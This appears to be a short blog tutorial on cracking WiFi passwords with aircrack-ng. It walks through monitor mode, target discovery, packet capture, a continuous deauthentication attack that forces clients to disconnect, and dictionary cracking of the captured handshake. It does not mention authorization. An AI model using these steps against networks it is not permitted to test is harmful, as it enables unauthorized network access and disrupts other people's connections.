Cracking WIFI Password with Aircrack-ng

󰃭 2024-07-06

rewrite

I’ve revisited and cleaned up this guide from my high school days to make it more understandable.

What is Aircrack-ng?

Aircrack-ng is a toolset used to assess WiFi network security. It includes:

  • Monitoring: Capturing WiFi data packets for analysis.
  • Attacking: Performing actions like packet injection and creating fake access points.
  • Testing: Checking WiFi card capabilities.
  • Cracking: Breaking WEP and WPA PSK (WPA 1 and 2) encryption.

Hardware Requirements

To use Aircrack-ng, you need a wireless card or USB adapter. Without one, you can’t perform WiFi cracking operations.

Checking Card Status

Ensure your wireless card is recognized:

root@kali:~# iwconfig

iwconfig

Starting Monitor Mode

Enable monitor mode on your wireless interface (wlan0 or similar):

root@kali:~# airmon-ng start wlan0

airmon-ng start wlan0

Finding Target WiFi Network

Identify the WiFi network (ESSID, BSSID, and channel number):

root@kali:~# airodump-ng wlan0mon

airodump-ng wlan0mon

Creating Capture File

Capture data from the target network:

airodump-ng -d [BSSID] -c[channel] -w [capture filename] wlan0mon

Creating Cap file Creating Cap file-2 file

Performing Deauthentication Attack

Disconnect a device from the network to capture the necessary handshake or PMKID:

aireplay-ng --deauth 0 -a [BSSID] wlan0mon

Device deauth

Cracking the Password

Once you’ve captured the handshake or PMKID, use Aircrack-ng to crack the WiFi password:

aircrack-ng [capture filename] -w [password list file]

Cracking password

Closing Monitor Mode

Disable monitor mode after you’re done:

root@kali:~# airmon-ng stop wlan0mon

Stop Monitor Mode


Enter your instance's address